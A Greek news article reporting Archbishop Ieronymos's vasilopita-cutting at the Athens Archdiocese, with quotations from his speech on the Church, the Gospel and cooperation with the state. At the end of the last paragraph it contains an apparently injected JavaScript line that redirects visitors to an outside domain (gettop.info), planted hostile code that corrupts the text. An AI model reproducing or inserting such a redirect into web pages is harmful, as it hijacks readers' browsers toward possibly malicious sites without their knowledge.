Ιερώνυμος: Ο Κύριος δεν ήρθε για να καταλύσει τον νόμο, το κράτος, αλλά να το συμπληρώσει

0
23

 

Σαφείς αιχμές και μηνύματα προς όλες τις κατευθύνσεις έστειλε ο Αρχιεπίσκοπος Αθηνών και πάσης Ελλάδος Ιερώνυμος κατά την κοπή της βασιλόπιτας στην Αρχιεπισκοπή Αθηνών.

Ο κκ. Ιερώνυμος έκοψε το πρώτο κομμάτι της βασιλόπιτας για τον υπουργό Παιδείας Κώστα Γαβρόγλου και το δεύτερο για τους πρόσφυγες και μετανάστες ενώ το παρέλαβε ο υπουργός κ. Γιάννης Μουζάλας.

Απευθύνοντας ομιλία ο Αρχιεπίσκοπος ανέφερε: «Ο καθένας με τη δύναμη που έχει και με τον τρόπο που μπορεί, καλούμαστε να λειτουργήσουμε και να προχωρήσουμε σαν ένα σώμα» και συμπλήρωσε: «Η Εκκλησία δεν είναι μουσείο ή κάτι μουσειακό, αλλά ένας ζωντανός οργανισμός, ένα Σώμα, μία λειτουργία. Γι’ αυτό ακριβώς αντιλαμβάνεται την αγωνία και ζει τα προβλήματα των ανθρώπων, τις δυσκολίες τους και γι’ αυτό ακριβώς, στην ευχή που μόλις διαβάσαμε, αγκαλιάζει όλα αυτά τα προβλήματα και παρακαλεί, εύχεται και ζητά από τον Θεό να είναι συμπαραστάτης, βοηθός στην αντιμετώπιση όλων αυτών των δυσκολιών και συγχρόνως να ανατείλει καλύτερες μέρες, να ζούμε κάτω από καλύτερες συνθήκες και να απολαύσουμε με καλύτερο τρόπο τη ζωή μας».

Μίλησε, εξάλλου, για την αναφορά-προτροπή του Ευαγγελίου ότι «εμείς οι άνθρωποι είμαστε το φως του κόσμου και το φως δεν το κρύβουμε, το βάζουμε ψηλά, για να φέγγει μέσα στο σπίτι. Είμαστε, άλλωστε, το αλάτι του κόσμου και το αλάτι έχει δύο ιδιότητες, η μια είναι να συντηρεί και η άλλη να νοστιμίζει, αν χάσει τις δύο αυτές ιδιότητες παύει να αξίζει».

Και διευκρίνισε: «Υπάρχει, επίσης, στο τέλος, κάτι που το έχουμε παρεξηγήσει και δεν το προσέχουμε. Ο Κύριος αναφέρει “ουκ ήλθον καταλύσαι τον νόμο αλλά πληρώσαι”, δηλαδή δεν ήρθε για να καταλύσει το νόμο, το κράτος, αλλά να το συμπληρώσει, να το βοηθήσει με έμμεσο, αλλά ουσιαστικό τρόπο. Μας καλεί σε συνεργασία και όλοι μαζί, ο καθένας με τη δύναμη που έχει, με τον τρόπο που μπορεί, πρέπει να λειτουργήσουμε και να προχωρήσουμε σαν ένα σώμα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here